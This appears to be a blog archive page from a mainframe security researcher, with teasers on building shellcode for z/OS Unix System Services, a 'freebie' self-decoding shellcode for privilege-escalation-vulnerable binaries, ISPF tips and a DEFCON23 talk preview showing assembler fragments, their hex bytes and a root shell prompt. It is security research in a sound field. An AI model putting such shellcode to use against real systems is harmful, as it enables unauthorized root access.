Creating shellcode on System Z (Mainframe) Unix System Services (USS) employs the same disciplines required for the same activities on Intel platforms. The difference lies in the syntax, assembler mnemonics, tools available, and debugging utilities. There are certainly other ways to achieve this, and I’m still refining my favorites. The below is one of my… Continue reading Building shellcode, egghunters and decoders.
Month: July 2015
Mainframe security research – perfectly summed up in this short video
Shellcode Freebie!
Got a burning privesc vulnerable binary on your USS? How about feeding it a little self-decoding shellcode? (Hint this is fully functional, find a C stub and try it yourself!) … Continue reading Shellcode Freebie!
Tips / Tricks – 7/2/15 (update)
Updated. Added update to the packet capture section below, included pcap export!
ISPF editor
Want more real estate in your ISPF editor? In an editing session enter EDSET in the command line, then check the line marked:
X Remove action bars in ISPF edit and view panels
This will remove the menu bars and… Continue reading Tips / Tricks – 7/2/15 (update)
Mainframe shellcode
Come see my talk at DEFCON23.
…
SLR 14,14
MVC 32(4,13),16(14)
L 14,32(,13)
…
\x1f\xee
\xd2\x03\xd0\x20\xe0\x10
\x58\xe0\xd0\x20
…
# id
uid=0(IBMUSER) gid=0(SYS1)
…
Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!